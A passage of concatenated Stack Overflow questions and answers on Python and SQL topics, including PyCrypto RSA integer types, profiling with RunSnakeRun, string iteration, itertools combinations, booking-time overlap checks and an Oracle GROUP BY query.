if wasString: return tuple(map(long_to_bytes, ciphertext))
else: return ciphertext
```
So, why is it that when I try to encrypt a number using RSA object, it gives an error?
Why does it expect the input to be in long format and not int? | The traceback tells clearly the `rsa.encrypt` wants an argument of long type. If it is a string, it will turns it to long type.
```
rsa.encrypt(4L,"")
```
This will work and the `4L` is still a number but it is of type long.
I think the reason to ask a long is, to perform an encryption, you have to do some padding and then perform on the padded number. The number is very long, for sha1, it is multiples of 512. So for a number at least 512 int can not satisfy the need. So long is asked. And you can see from your result of inspect, it only do type conversion to string, no int. So if you pass an int, it is wrong. You have no method except hacking the source code of the module.
For a long, it returns a long. Maybe you can use this to do the encoding:
```
hex(rsa.encrypt(4L, '')[0]).rstrip('L').lstrip(0x)
'31bf11047cbe9115541e29acb5046d98f2a9bdc44d4768668e9119f8eca24bf24dfc4ac070950734e819675f93e1809859b750df63e8bc71afc7c83edfc6d2f59f495c8e378e0633f07e21672a7e862cfa77a6aede48075dec0cd2b1d8c016dade779f1ea8bd9ffa8ef314c4e391b0f5860cf06cb0f991d2875c49722e98b94f'
```
Also you can change the integer to bytes: `rsa.encrypt(input, '')[0].encode('hex')`. The input is `struct.pack('b', 4)`. | Python 2.x has two types of integers:
* The `int` type, which matches the C type `long` on the local platform. The precision is limited, but it is at least 32 bits.
* The `long` type, which has infinite precision.
The `encrypt` and `decrypt` method of the RSA key object in PyCrypto only works with `long` or binary strings, not with `int`. That is documented in the [PyCrypto's API](https://www.dlitz.net/software/pycrypto/api/current/Crypto.PublicKey.RSA._RSAobj-class.html).
In theory, you could fix your code by forcing the integers to the required type using the function `long()`, but it is worth pointing out that your code will not be secure.
RSA encryption should be done with [OAEP padding](https://www.dlitz.net/software/pycrypto/api/current/Crypto.Cipher.PKCS1_OAEP-module.html) and byte strings as input/ouput. | Python RSA encrypt integers | [
"",
"python",
"rsa",
"pycrypto",
""
] |
I want to profile python code on Widnows 7. I would like to use something a little more user friendly than the raw dump of cProfile. In that search I found the GUI RunSnakeRun, but I cannot find a way to download RunSnakeRun on Windows. Is it possible to use RunSnakeRun on windows or what other tools could I use?
**Edit:** I have installed RunSnakeRun now. That's progress, thanks guys. How do you run it without a linux command line?
**Edit 2:** I am using this tutorial <http://sullivanmatas.wordpress.com/2013/02/03/profiling-python-scripts-with-runsnakerun/> but I hang up at the last line with "python: can't open file 'runsnake.py': [Errno 2] No such file or directory " | The standard solution is to use cProfile (which is in the standard library) and then open the profiles in RunSnakeRun:
<http://www.vrplumber.com/programming/runsnakerun/>
cProfile, however only profiles at the per-functions level. If you want line by line profiling try line profiler:
<https://github.com/rkern/line_profiler> | I installed runsnake following these [installation instructions](http://www.vrplumber.com/programming/runsnakerun/).
The step `python runsnake.py profile.pfl` failed because the installation step (`easy_install SquareMap RunSnakeRun`) did not create a file `runsnake.py`.
For me (on Ubuntu), the installation step created an executable at `/usr/local/bin/runsnake`. I figured this out by reading the console output from the installation step. It may be in a different place on Windows, but it should be printed in the output of `easy_install`. To read a profile file, I can execute `/usr/local/bin/runsnake profile.pfl`. | What tools should I use to profile Python code on window 7 | [
"",
"python",
"windows",
"python-2.7",
"profiling",
"cprofile",
""
] |
I want to make a script which will type string letters one by one
```
def autotype(info):
count = len(info) #Countign number of letters of the string
splitlist = list(info)
i = int(count) #getting an error on this line! it accept i=int(0) but my loop doesnt work because of this
while i>0:
sys.stdout.write(splitlist[i])
time.sleep(0.2)
i -= 1
info = str("hello world")
autotype(info)
```
the error is: list index out of range
how do i fix it? | The length of a list is the number of elements in a list. But, lists start at index `0`, and so they will end at index `length - 1`. So, to fix your code as is, it should be `i = count - 1`. (You don't need to cast it to an `int`, it's already one.)
Better yet, rather than iterating using a counter in a `while` loop, just use a `for` loop. You can use the `for` loop to iterate over the characters in a string.
```
for ch in info:
sys.stdout.write(ch)
sys.stdout.flush() # as mawimawi suggests, if you don't do this, it will
# actually just come out all on one line at once.
time.sleep(0.2)
```
You also don't need to cast `"hello world"` to a string - it's already one. | Your script is quite un-pythonic. Here is something that would do the same. Strings are iterables, so:
```
def autotype(info):
for x in info:
sys.stdout.write(x)
sys.stdout.flush() # you need this, because otherwise its' buffered!
time.sleep(0.2)
```
That's all you need. | Iterating over a string in Python | [
"",
"python",
""
] |
I am trying to iterate over an array twice to have pairs of elements (e\_i,e\_j) but I only want the elements such that i < j.
Basically, what I want would look like this is C-like languages.
```
int my_array[N] = ...;
for (int i=0; i<N; i++)
for (int j=i+1; j<N; j++)
something(my_array[i],my_array[j]);
```
I didn't find what I was looking for in [itertools](https://docs.python.org/library/itertools.html) (the closest thing I've found was `itertools.product(*iterables[, repeat])`).
I tried a few things but I am not really convinced by any of them :
```
my_list=range(10)
# Using enumerate and slices - explicit loop
res=[]
for i,j in enumerate(my_list):
for k in my_list[i+1:]:
res.append((j,k))
print res
# Using enumerate and slices - list comprehension
res=[(j,k) for i,j in enumerate(my_list) for k in my_list[i+1:]]
print res
# Using enumerate and xrange - explicit loop
res=[]
for i,j in enumerate(my_list):
for k in range(i+1, len(my_list)):
res.append((j,my_list[k]))
print res
# Using enumerate and xrange - list comprehension
res=[(j,my_list[k]) for i,j in enumerate(my_list) for k in range(i+1, len(my_list))]
print res
```
I'm still convinced that there is a better and more pythonic solution. Any suggestion is welcome. | Just use `itertools.combinations(my_list, 2)`. | Can't you just use the `range` function and go with:
```
vect = [...]
for i in range(0, len(vect)):
for j in range(i+1, len(vect)):
do_something()
``` | Iterate over array twice (cartesian product) but consider only half the elements | [
"",
"python",
"iterator",
"combinations",
"python-itertools",
""
] |
I am using MS SQL server 2008. Here I need to compare the newly entered start time and End time of an event with the existing event timings. In the Database I need to check the new Starting time and End time values and the time Period should not match with the existing/ already booked event timings.
I need to check this condition in the Database stored procedure, if the condition is satisfied then only accept the event. Best example is Conference hall booking. | ```
SELECT @count = COUNT (EventID) FROM TblEvent WHERE (('@STARTTIME' BETWEEN StartTime AND EndTime) or ('@ENDTIME' BETWEEN StartTime AND EndTime));
IF @count = 0
Begin
Select @count = COUNT (EventID) FROM TblEvent WHERE (('@STARTTIME' < StartTime and '@ENDTIME' > EndTime));
END
IF @count > 0
BEGIN
SELECT 'Event is Already Exists at that point of time please select another Time ' AS 'MESSAGE';
END
Else
BEGIN
//ADD QUERY TO SAVE THE THE EVENT IN DB//
SELECT 'Event is Added' AS 'MESSAGE';
END
```
NOTE:
@STARTTIME = USER ENTERED START TIME,
@ENDTIME =USER ENTERED END TIME | Answer is `(StartA <= EndB) and (EndA >= StartB)`. Please, read these: [Determine Whether Two Date Ranges Overlap](https://stackoverflow.com/questions/325933/determine-whether-two-date-ranges-overlap) | How to compare Starting time and End time of a event with existing events of same time on same day? | [
"",
"asp.net",
"sql",
"sql-server-2008",
""
] |
I have a function that takes in a list of class instances (but sometimes it could just be a single no list class instance) and I want to print it out regardless if it is a list or not. I know you can do it by doing something like this:
```
def func(obj):
if type(obj) == list:
for o in obj:
print o
else:
print obj
```
Is there a fast, better way to do this or is this the cleanest way? | My initial thought using simplest python code would be:
```
def func(obj):
if not isinstance(obj,list):
obj = [obj]
for o in obj:
print o
``` | ```
def func(obj):
return map(some_function,obj) if isinstance(obj,(list,tuple)) else some_function(obj)
```
maybe? for some definition of better | Printing out a list of unknown size in a function in python | [
"",
"python",
""
] |
Suppose I have a dictionary:
```
D1 = {'A1' : [2, 3], 'B1': [3, 3], 'C1' : [4, 5]}
```
and I wanted to remove the all `3`s from `D1` so that I would get:
```
D1 = {'A1' : [2], 'B1': [], 'C1' : [4, 5]}
``` | Something like this works, assuming 3 is always appears in the value, not in the key
```
>>> for v in D1.values():
... if 3 in v:
... v.remove(3)
...
>>> D1
{'A1': [2], 'C1': [4, 5], 'B1': [3]}
```
EDIT: just realized can be multiple occurence, try this one
```
>>> D1 = {'A1' : [2, 3], 'B1': [3, 3], 'C1' : [4, 5]}
>>> for k, v in D1.items():
... D1[k] = filter(lambda x: x!=3, v)
...
>>> D1
{'A1': [2], 'C1': [4, 5], 'B1': []}
``` | Here's a one-liner:
```
threeless = {k: [e for e in v if e != 3] for k, v in D1.iteritems()}
``` | How to remove a value but keep the corresponding key in a dictionary? | [
"",
"python",
""
] |
I have a working web application on Flask with SqlAlchemy for moderation of news, it has some api methods to handle moderation requests, such as approve, deny currently selected news, list them, etc.
I want to write unit tests to this methods, and I made them work, but I don't understand how to implement executing all requests which I do from test cases in one db session, so that I could remove all changes to database. Or is there another cleaner or proper way to do this?
I've found out that maybe all I need is "scoped\_session" in SqlAlchemy, but all my attempts to implement it have failed. If that's correct way, please, tell me where to use this lines of code (in settings, or in test case set\_up method).
```
from sqlalchemy.orm import scoped_session
from sqlalchemy.orm import sessionmaker
session_factory = sessionmaker()
Session = scoped_session(session_factory)
``` | I suggest you use the [Flask-Testing](http://pythonhosted.org/Flask-Testing/) extension. This is an approved extension which lets you do the unit testing as you desire. It has a specific section for SQLAlchemy as well.
**Testing with SQLAlchemy**
This covers a couple of points if you are using Flask-Testing with SQLAlchemy. It is assumed that you are using the Flask-SQLAlchemy extension, but if not the examples should not be too difficult to adapt to your own particular setup.
First, **ensure you set the database URI to something other than your production database** ! Second, it’s usually a good idea to create and drop your tables with each test run, to ensure clean tests:"
```
from flask.ext.testing import TestCase
from myapp import create_app, db
class MyTest(TestCase):
SQLALCHEMY_DATABASE_URI = "sqlite://"
TESTING = True
def create_app(self):
# pass in test configuration
return create_app(self)
def setUp(self):
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
``` | This is the way I've been running unit tests recently. I'm assuming since you are using SQLAlchemy that you're using model classes. I'm also assuming that all of your tables are defined as SQLAlchemy model classes.
```
from flask import Flask
import unittest
from app import db
from app.models import Log
from constants import test_logs
class appDBTests(unittest.TestCase):
def setUp(self):
"""
Creates a new database for the unit test to use
"""
self.app = Flask(__name__)
db.init_app(self.app)
with self.app.app_context():
db.create_all()
self.populate_db() # Your function that adds test data.
def tearDown(self):
"""
Ensures that the database is emptied for next unit test
"""
self.app = Flask(__name__)
db.init_app(self.app)
with self.app.app_context():
db.drop_all()
```
Since you're using the same DB set up as your app this allows you to build and destroy a test database with every unit test you run. | How can I test a Flask application which uses SQLAlchemy? | [
"",
"python",
"session",
"testing",
"flask",
"sqlalchemy",
""
] |
Alrigt, lets say I have these two dictionaries:
```
A = {(3,'x'):-2, (6,'y'):3, (8, 'b'):9}
B = {(3,'y'):4, (6,'y'):6}
```
I am trying to add them together such that I get a dict similar to this:
```
C = {(3,'x'):-2,(3,'y'):4, (6,'y'):9, (8, 'b'):9}
```
I have tried making a comprehension that does this for dicts of any lenght. But it seems a bit difficult for a newbie. I am at a level where I try stuff like this for example:
Edited:
```
>>> {k:A[k]+B[d] for k in A for d in B}
{(6, 'y'): 7, (3, 'x'): 2, (8, 'b'): 13}
```
I get this far due to help but it leaves out the
(3,'y'):4 for some reason | Since you're using Python 3, one possible approach would be:
```
>>> A = {(3,'x'):-2, (6,'y'):3, (8, 'b'):9}
>>> B = {(3,'y'):4, (6,'y'):6}
>>> {k: A.get(k,0) + B.get(k,0) for k in A.keys() | B.keys()}
{(8, 'b'): 9, (3, 'x'): -2, (6, 'y'): 9, (3, 'y'): 4}
```
In Python 3, `.keys()` returns a `dict_keys` object, and we can use the `|` operator to take the union of the two. (That's why `A.keys() + B.keys()` won't work.)
(I'd probably use a `Counter` myself, FWIW.) | I would use a [collections.Counter](http://docs.python.org/2/library/collections.html#collections.Counter) for this:
```
>>> A = {(3,'x'):-2, (6,'y'):3, (8, 'b'):9}
>>> B = {(3,'y'):4, (6,'y'):6}
>>> import collections
>>> C = collections.Counter(A)
>>> C.update(B)
>>> dict(C)
{(3, 'y'): 4, (8, 'b'): 9, (3, 'x'): -2, (6, 'y'): 9}
``` | Python: adding two dicts together | [
"",
"python",
""
] |
Im trying to query some data and one of them is a datetime format. I want that is shows `dd/mm/yy` with no time on it directly form the select. Is this possible?
My query is and the join\_date is datetime that i need to be changed to short date:
```
$query = mysql_query("SELECT id,username,join_date,is_active FROM members",$con)
or trigger_error(mysql_error());
```
This query goes directy in a Json output array. So i want to convert it directy form the query. | Use the MySQL [`DATE_FORMAT` function](http://dev.mysql.com/doc/refman/5.1/en/date-and-time-functions.html#function_date-format) for this:
```
SELECT id, username, DATE_FORMAT(join_date, '%d/%m/%y') AS join_formatted, is_active
FROM members
```
In this example, the column name for the formatted date will be `join_formatted`, and its type will be `VARCHAR`.
The format string returns the date as `dd/mm/yy` as requested, but I'm personally more comfortable when the date includes the full century. To get the full century, use uppercase `Y` in the format string: `%d/%m/%Y`. | try this :
```
"SELECT id, username, DATE_FORMAT(join_date,'%d/%m/%y'), is_active FROM members"
``` | Change datatime to date dd/mm/yy | [
"",
"mysql",
"sql",
""
] |
I am trying to create a simple calculator where it accepts arguments at the command line. For example at the command line:
```
Calculator.py 1 2 44 6 -add
```
will give me the sum of the numbers. However, how can the user input infinite amount of arguments. I know you have to use \*args or something of the like in functions and i just wanted to know how to incorporate that in the command line using argparse. | ```
import argparse
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('integers', metavar='N', type=int, nargs='+',
help='an integer for the accumulator')
parser.add_argument('--sum', dest='accumulate', action='store_const',
const=sum, default=max,
help='sum the integers (default: find the max)')
args = parser.parse_args()
print args.accumulate(args.integers)
```
<https://docs.python.org/3/library/argparse.html> | You don't need to, command line arguments are stored in [`sys.argv`](http://docs.python.org/2/library/sys.html#sys.argv) which will give you a list of the command line arguments. You just need to sum over them.
```
from sys import argv
print sum(map(int, argv[1:])) # We take a slice from 1: because the 0th argument is the script name.
```
And just do
```
python testScript.py 1 2 3
6
```
**P.S** - Command line arguments are stored as strings, so you need to `map` them to integers to sum over them.
`*args` is used when you need to pass unknown number of values to a function. Consider the following -
```
>>> def testFunc(*args):
return sum(args)
>>> testFunc(1, 2, 3, 4, 5, 6)
21
``` | Infinite Amount of Command Line Arguments in Python | [
"",
"python",
"argparse",
""
] |
I've been reading on Wikipedia and it seems that NeXT developed an object-relational mapping framework for Objective-C called Enterprise Objects Framework. And then Apple absorbed NeXT and EOF became WebObjects. And then WebObjects became Java.
Is there any part of the EOF or Objective-C based WebObjects lying around? An object-relational mapping framework for Objective-C would be immensely useful to me.
UPDATE: I'm looking for a database agnostic ORM system that can connect to MySQL and SQLite at least, Oracle and PostgreSQL would be nice. I need to be able to update the database separately from the ORM, something CoreData does not allow. | EOF has become CoreData and CoreData doesn't support arbitrary schemas or backing stores. So I made a couple of frameworks that do.
[ORDA](https://github.com/Firelizzard-Inventions/ORDA), the **O**bjective-C **R**elational **D**atabase **A**bstraction framework, is a 'standard' interface for creating Objective-C database drivers. The goal is to build a system for Objective-C that serves the same purpose of the JDBC.
[CORM](https://github.com/Firelizzard-Inventions/CORM), the Objective-**C** **O**bject **R**elational **M**apping framework, leverages Cocoa technologies to provide a powerful, dynamic, and extremely simple to use ORM for Objective-C. It is currently under development. | I'm pretty sure you're looking for [Core Data](http://developer.apple.com/library/mac/#documentation/cocoa/Conceptual/CoreData/cdProgrammingGuide.html).
From [wikipedia](http://en.wikipedia.org/wiki/Core_Data):
> On computer systems running Mac OS X and mobile devices running iOS,
> Core Data is an object graph and persistence framework provided by
> Apple. It was introduced in Mac OS X 10.4 Tiger and iOS with iPhone
> SDK 3.0. It allows data organised by the relational
> entity–attribute model to be serialised into XML, binary, or SQLite
> stores. The data can be manipulated using higher level objects
> representing entities and their relationships. Core Data manages the
> serialised version, providing object lifecycle and object graph
> management, including persistence. Core Data interfaces directly with
> SQLite, insulating the developer from the underlying SQL. | Objective-C and SQL? | [
"",
"sql",
"objective-c",
"webobjects",
""
] |
I am trying to write a query to count the number of records based on a number of different ranges.
I have success with using `union`, but I feel there is a better way to do it.
Here is what I've done:
```
select count(col1) as range1
from tbl1
where col1 <= 15000
union
select count(col1) as range2
from tbl1
where col1 > 15001 and col1 <= 30000
union
select count(col1) as range3
from tbl1
where col1 > 30001 and col1 <= 45000
etc...
```
I am using sql server 2008. Like I stated above, I'm positive there is a better way to do this, maybe something like this: [sql count](https://stackoverflow.com/questions/17577155/counting-occurences-within-a-range-of-my-table-sql-server-2012),
EDIT: Yes, the database is sql 2008, and the answers below work exactly as needed. I forgot to mention that I'm actually reading a `JSON` file that has been `serialized` via coldfusion `serializeJSON`. So in the db, everything below worked perfectly, but coldfusion query of queries doesn't support the `CASE` statement, or it doesn't appear to. | One way is with conditional summation (for the values in separate columns):
```
select sum(case when col1 <= 15000 then 1 else 0 end) as range1,
sum(case when col1 > 15001 and col1 <= 30000 then 1 else 0 end) as range2,
sum(case when col1 > 30001 and col1 <= 45000 then 1 else 0 end) as range3
from tbl1;
```
Another way is with `group by` (for the values on separate rows):
```
select (case when col1 <= 15000 then 'range1'
when col1 > 15001 and col1 <= 30000 then 'range2'
when col1 > 30001 and col1 <= 45000 then 'range3'
else 'other'
end) as range, count(*) as cnt
from tbl1
group by (case when col1 <= 15000 then 'range1'
when col1 > 15001 and col1 <= 30000 then 'range2'
when col1 > 30001 and col1 <= 45000 then 'range3'
else 'other'
end);
```
I often use a subquery for this form:
```
select range, count(*)
from (select t.*,
(case when col1 <= 15000 then 'range1'
when col1 > 15001 and col1 <= 30000 then 'range2'
when col1 > 30001 and col1 <= 45000 then 'range3'
else 'other'
end) as range
from tbl1
group by range;
```
That way, the definition of `range` only appears once.
EDIT:
The above all use the logic from the OP. However, the above logic misses the values of `15001` and `30001`. My guess is that the OP really means `col1 > 15000 and col1 <= 30000` and `col1 > 30000 and col1 <= 45000` for the conditions. But, I'm not changing them because the above is how the original question is phrased (perhaps there is something special about `15001` and `30001`). | Personally I prefer using a derived (or physical) table to store my range boundaries which I then join back to in order to find my results.
I reckon the code is simpler and easier to extend if required
Something a little like this:
```
; WITH ranges (lbound, ubound) AS (
SELECT 0, 1500
UNION ALL SELECT 1500, 3000
UNION ALL SELECT 3000, 4500
)
SELECT ranges.lbound
, ranges.ubound
, Count(your_table.value) As turtle
FROM ranges
LEFT
JOIN your_table
ON your_table.value >= ranges.lbound
AND your_table.value < ranges.ubound
GROUP
BY ranges.lbound
, ranges.ubound
``` | Counting number of records for specific ranges sql server | [
"",
"sql",
"sql-server",
"coldfusion",
""
] |
given a dictionary of lists
```
vd = {'A': [1,0,1], 'B':[-1,0,1], 'C':[0,1,1]}
```
I want to add the lists element wise. So I want to add first element from list A to first element of list B vice versa
the complexity is that you cannot rely on the labels being A, B, C. It can be anything. second the length of the dictionary is also variable. here it is 3. but it could be 30.
The result i need is a list [0, 1, 3] | In short:
```
>>> map(sum, zip(*vd.values()))
[0, 1, 3]
```
---
# Explanation
Given a dictionary:
```
>>> vd = {'A': [1,0,1], 'B': [-1,0,1], 'C': [0,1,1]}
```
We can [get the values](http://docs.python.org/2/library/stdtypes.html#dict.values):
```
>>> values = vd.values()
>>> values
[[1, 0, 1], [-1, 0, 1], [0, 1, 1]]
```
Then [zip](http://docs.python.org/2/library/functions.html#zip) them up:
```
>>> zipped = zip(*values)
>>> zipped
[(1, -1, 0), (0, 0, 1), (1, 1, 1)]
```
Note that `zip` zips up each argument; it doesn't take a list of things to zip up. Therefore, we need the `*` to unpack the list into arguments.
If we had just one list, we could [sum](http://docs.python.org/2/library/functions.html#sum) them:
```
>>> sum([1, 2, 3])
6
```
However, we have multiple, so we can [map](http://docs.python.org/2/library/functions.html#map) over it:
```
>>> map(sum, zipped)
[0, 1, 3]
```
All together:
```
>>> map(sum, zip(*vd.values()))
[0, 1, 3]
```
---
# Extending to an average rather than a sum
This approach is also easily extensible; for example, we could quite easily make it average the elements rather than sum them. To do that, we'd first make an `average` function:
```
def average(numbers):
# We have to do the float(...) so it doesn't do an integer division.
# In Python 3, it is not necessary.
return sum(numbers) / float(len(numbers))
```
Then just replace `sum` with `average`:
```
>>> map(average, zip(*vd.values()))
[0.0, 0.3333, 1.0]
``` | So you just want to add up all the values elementwise?
`[sum(l) for l in zip(*vd.values())]` | How to add elements from a dictonary of lists in python | [
"",
"python",
""
] |
Is there are a way to pass a variable between two python decorators applied to the same function? The goal is for one of the decorators to know that the other was also applied. I need something like decobar\_present() from the example below:
```
def decobar(f):
def wrap():
return f() + "bar"
return wrap
def decofu(f):
def wrap():
print decobar_present() # Tells me whether decobar was also applied
return f() + "fu"
return wrap
@decofu
@decobar
def important_task():
return "abc"
```
More generally I would like to be able to modify the behavior of decofu depending on whether decobar was also applied. | You can add the function to a "registry" when `decobar` is applied to it, then later check the registry to determine whether `decobar` was applied to the function or not. This approach requires preserving original function's `__module__` and `__name__` properties intact (use `functools.wraps` over the wrapper function for that).
```
import functools
class decobar(object):
registry = set()
@classmethod
def _func_key(cls, f):
return '.'.join((f.__module__, f.func_name))
@classmethod
def present(cls, f):
return cls._func_key(f) in cls.registry
def __call__(self, f):
self.registry.add(self._func_key(f))
@functools.wraps(f)
def wrap():
return f() + "bar"
return wrap
# Make the decorator singleton
decobar = decobar()
def decofu(f):
@functools.wraps(f)
def wrap():
print decobar.present(f) # Tells me whether decobar was also applied
return f() + "fu"
return wrap
@decofu
@decobar
def important_task():
return "abc"
```
Used a class to implement `decobar`, as it keeps `registry` and `present()` in a single namespace (which feels slighly cleaner, IMO) | To pass a variable between two python decorators you can use the decorated function's keyword arguments dictionary. Only don't forget to pop the added argument from there before calling the function from within the second decorator.
```
def decorator1(func):
def wrap(*args, **kwargs):
kwargs['cat_says'] = 'meow'
return func(*args, **kwargs)
return wrap
def decorator2(func):
def wrap(*args, **kwargs):
print(kwargs.pop('cat_says'))
return func(*args, **kwargs)
return wrap
class C:
@decorator1
@decorator2
def spam(self, a, b, c, d=0):
print("Hello, cat! What's your favourite number?")
return a + b + c + d
x=C()
print(x.spam(1, 2, 3, d=7))
``` | passing variables between two python decorators | [
"",
"python",
"decorator",
"chaining",
""
] |
I have this `select` statement and what I am trying to accomplish is to get data in the
`DosagePerUnits` column only if `Dosage` is not equal to empty or 1 and if `Units` is not empty or 1.
Can someone help me please ?
```
select
sbd.Code, c.Description, sbd.Dosage,
Case
when sbd.Units = '' then '1'
else sbd.Units
end as Units,
ad.ApptDate, sbd.RCycle, sbd.RWeek, sbd.RDay,
t.HistoryOrder, t.TypeId, sbd.Dosage + '/' + sbd.UnitsAS DosagePerUnits
from
bill_SuperBillDetail sbd,
bill_ProcedureVerification pv,
AppointmentData ad,
CPTCode c,
CPTType t
where
sbd.AccessionNumber = pv.AccessionNumber
and pv.ApptId = ad.ApptId
and ad.PatientId = 443
and ad.ApptDate <= GETDATE()
and ad.ApptDate > '2009-11-15 00:00:00.000'
and c.TypeId = t.TypeId
``` | According to your description, it should be like this:
```
CASE WHEN ISNULL(sbd.Dosage, '1') <> '1' AND ISNULL(sbd.Units, '1') <> '1' THEN
sbd.Dosage + '/' + sbd.Units
ELSE NULL END AS DosagePerUnits
```
`ISNULL(x, 1)` replaces x with 1 if it is null. So `ISNULL(x, 1)` is = 1 if x is either 1 or NULL.
EDIT:
Changed to the assumption that [Dosage] and [Unit] are both *varchar* as your comment indicates. | instead of
Case when sbd.Units = '' then '1' else sbd.Units end as Units,
try
Coalesce(sbd.Units,1) as Units, | CASE statement IF ELSE in SQL Server | [
"",
"sql",
"sql-server",
"t-sql",
""
] |
I'm using the [mutagen](https://code.google.com/p/mutagen/) module for Python to get the artist of various MP3 files I have.
Here's the code giving the error:
```
audio = EasyID3(C:\Users\Owner\Music\Music\Blue Öyster Cult\Blue Öyster Cult\Cities on Flame)
print audio["artist"]
```
The code is working for most of my MP3 files, but there are a select few that continually give the following error:
> KeyError: 'TPE1'
And because of that error, I can't see the artist. Note that these MP3 files all have an artist, and none of them have special characters or anything like that.
Why is this happening? And how can I fix it?
Thanks | Most likely, you're looking for a key which doesn't exist in mutagens id3 dictionary. Do a simple check like you would do for a regular dictionary:
```
if 'artist' in audio:
print audio['artist']
```
I've tried with and without ensuring that the argument is Unicode and it works in both cases with `Python 2.7.3` | This is probably because you removed its value manually via the file properties/details.
That's what happened with me (with Python 3.4).
You could redefine the key by following:
```
if not 'keyname' in Dic:
'keyname' = ""
```
If that was the reason it should work again. | What is the "TPE1" KeyError? | [
"",
"python",
"mp3",
"id3",
"mutagen",
""
] |
I'm trying to figure out the best way to design a database to support private user-defined groups. Pretty much identical to how Google Circles are. These are to be for **JUST** the user, much like circles are - that's why creating a user group design like I found here: <https://stackoverflow.com/a/9805712/2580503> would be undesirable.
So far the only solution I can come up with is to have a table like this:
> > USER\_ID | GROUP\_ID | ARRAY(USER\_ID)
Where the PKEY would actually be a compound key of (USER\_ID, GROUP\_ID). This way a user could have multiple groups.
Would greatly appreciate any feedback on this proposed solution and would love to hear if there is a better way to do it.
Thanks!
**Edit:** Just to clarify, GROUP\_ID would not reference a separate table, it would just indicate the number group for that user. Also there would be a name etc. for the group as well - just wasn't necessary to include as part of the question. | This must involve at least three (3) tables if you want a normalized design. USERS, USER\_GROUPS, and USER\_GROUPS\_MEMBERS. You are correct that the PK of USER\_GROUPS would be a dyad (USER, GROUP). The PK of USER\_GROUPS\_MEMBERS would be a triad (USER, GROUP, USER). | What about?
```
Groups (GROUP_ID, USER_ID, GROUP_NAME)
Members (MEMBER_ID, GROUP_ID, USER_ID)
```
Although `Groups` might appear backwards, it actually lists the `USER_ID` that owns a `GROUP_ID` while `Members` gives the `MEMBER_ID` to which could be associated rows that have to do with this `USER_ID` in the given `GROUP_ID`. | Database Design for user defined groups | [
"",
"sql",
"database",
"database-design",
""
] |
Okay so I'm using the Violent Python book and made an SSH brute force program. When I run the following code
```
import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxconnections)
Found = False
Fails = 0
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print '[+} Paassword Found: ' + password
Found = True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect9host, user, password, False)
finally:
if release: connection_lock.release()
def main():
parser = optparse.OptionParser('usage%prog '+\
'-H <target host> -u <user> -F <password list>')
parser.add_option('-H', dest='tgtHost', type='string', \
help= 'specify target host')
parser.add_option('-u', dest='user', type='string', \
help='specify the user')
parser.add_option('-F', dest='psswdFile', type='string, \
help='specify password file')
(options, args) = parser.parse_args()
host = options.tgtHost
passwdFile = options.psswdFile
user = options.user
if host == None or psswdFile == None or user == None:
print parser.usage
exit(0)
fn = open(psswdFile, 'r')
for line in fn.readlines():
if Found:
print "[+] Exting: Password Found."
exit(0)
if Fails > 5
print "[!] Exiting: Too many socket timeouts"
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print "[-] Testing: "+str(password)
t = Thread(target=connect, args+(host, user, \
password, True))
child = t.start()
if __name__ == '__main__':
main()
```
and run it on terminal using the following command:
```
python brute_force_ssh_pxssh.py -H 10.10.1.36 -u root -F pass.txt
```
I get this error:
```
File "brute_force_ssh_pxssh.py", line 17
Found = True
^
SyntaxError: invalid syntax
```
I checked the sample code and it is written exactly lke this... Any help is greatly appreciated. (I am still a noob in Python). Thanks! | You have some problems with identation in various parts of the code
Other than line 17, it looks like you have an identation problem also on
line 20, line 23 (the elif block), line 27, line 38, and lines from 48 to 59 seems to be bad indented.
Also you have a missing ' on line 34 and an extra ) on line 25 | The indentation is wrong. Should be
```
try:
s = pxssh.pxssh()
s.login(host, user, password)
print '[+} Paassword Found: ' + password
Found = True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails += 1
``` | Syntax Error which I can't seem to find | [
"",
"python",
""
] |
I have a table with three fields: `ID`, `date` and `action`. The three possible values of `action` are `X`, `Y` and `Z`. I want a query which, for each `ID` in the table for which there ia a row with a `Z` action, will return the most recent row for the same `ID` with an `X` action, if one exists.
Here is what I want to do in MySQL. I copy-and-pasted the code from [sqlfiddle.com](http://sqlfiddle.com), so I know it works.
```
create table a (id int,
date int,
action varchar(1));
insert into a values(1, 1, 'X');
insert into a values(1, 2, 'X');
insert into a values(1, 3, 'Z');
insert into a values(2, 1, 'X');
insert into a values(2, 2, 'Y');
insert into a values(2, 3, 'Y');
insert into a values(2, 4, 'Z');
insert into a values(3, 1, 'X');
insert into a values(3, 2, 'Y');
insert into a values(3, 3, 'X');
insert into a values(3, 4, 'Z');
insert into a values(4, 3, 'X');
SELECT a.id,
max(a.date) as Xdate,
b.date as Zdate,
a.action FROM a,
(SELECT * FROM a WHERE a.action = 'Z') b
WHERE
a.date < b.date AND
a.ID = b.ID AND
a.action = 'X'
GROUP BY a.id;
```
I can't use the `GROUP BY` clause with other fields like this in Oracle, so I did a nested subquery which found the maximum date for each ID separately, but it is very slow (I am expecting to get about 10^5 rows) and I was hoping that there was a better way to do it which would be faster. (I can't post my actual Oracle query at the moment because it does not run in SQLfiddle; it keeps complaining about rows being ambiguously defined.)
Can the above query be made to work in Oracle somehow? If not, is there an equivalent way to do it which will run in a reasonable time? | This works (although it may be able to be simplified):
```
SELECT a.id,
max(a."date") as Xdate,
b."date" as Zdate,
a.action
FROM a INNER JOIN
(SELECT *
FROM a
WHERE a.action = 'Z') b
ON a.ID = b.ID
WHERE a."date" < b."date"
AND a.action = 'X'
GROUP BY a.id, b."date", a.action
```
* [SQL Fiddle Demo](http://sqlfiddle.com/#!4/cd704/1)
Please note, you need to use `"` around reserved words -- in this case the column `date`. You also need to add all of your fields to the `GROUP BY` clause. MySQL allows it without, but Oracle does not.
---
Edit, simplified version:
```
SELECT a.Id, max(a."date"), b."date", a.action
FROM a
INNER JOIN a b ON a.Id = b.Id AND b.action = 'Z'
WHERE a.action = 'X'
AND a."date" < b."date"
GROUP BY a.Id, b."date", a.action
```
* [Updated Fiddle](http://sqlfiddle.com/#!4/cd704/3) | Here other solution:
```
WITH temp AS (
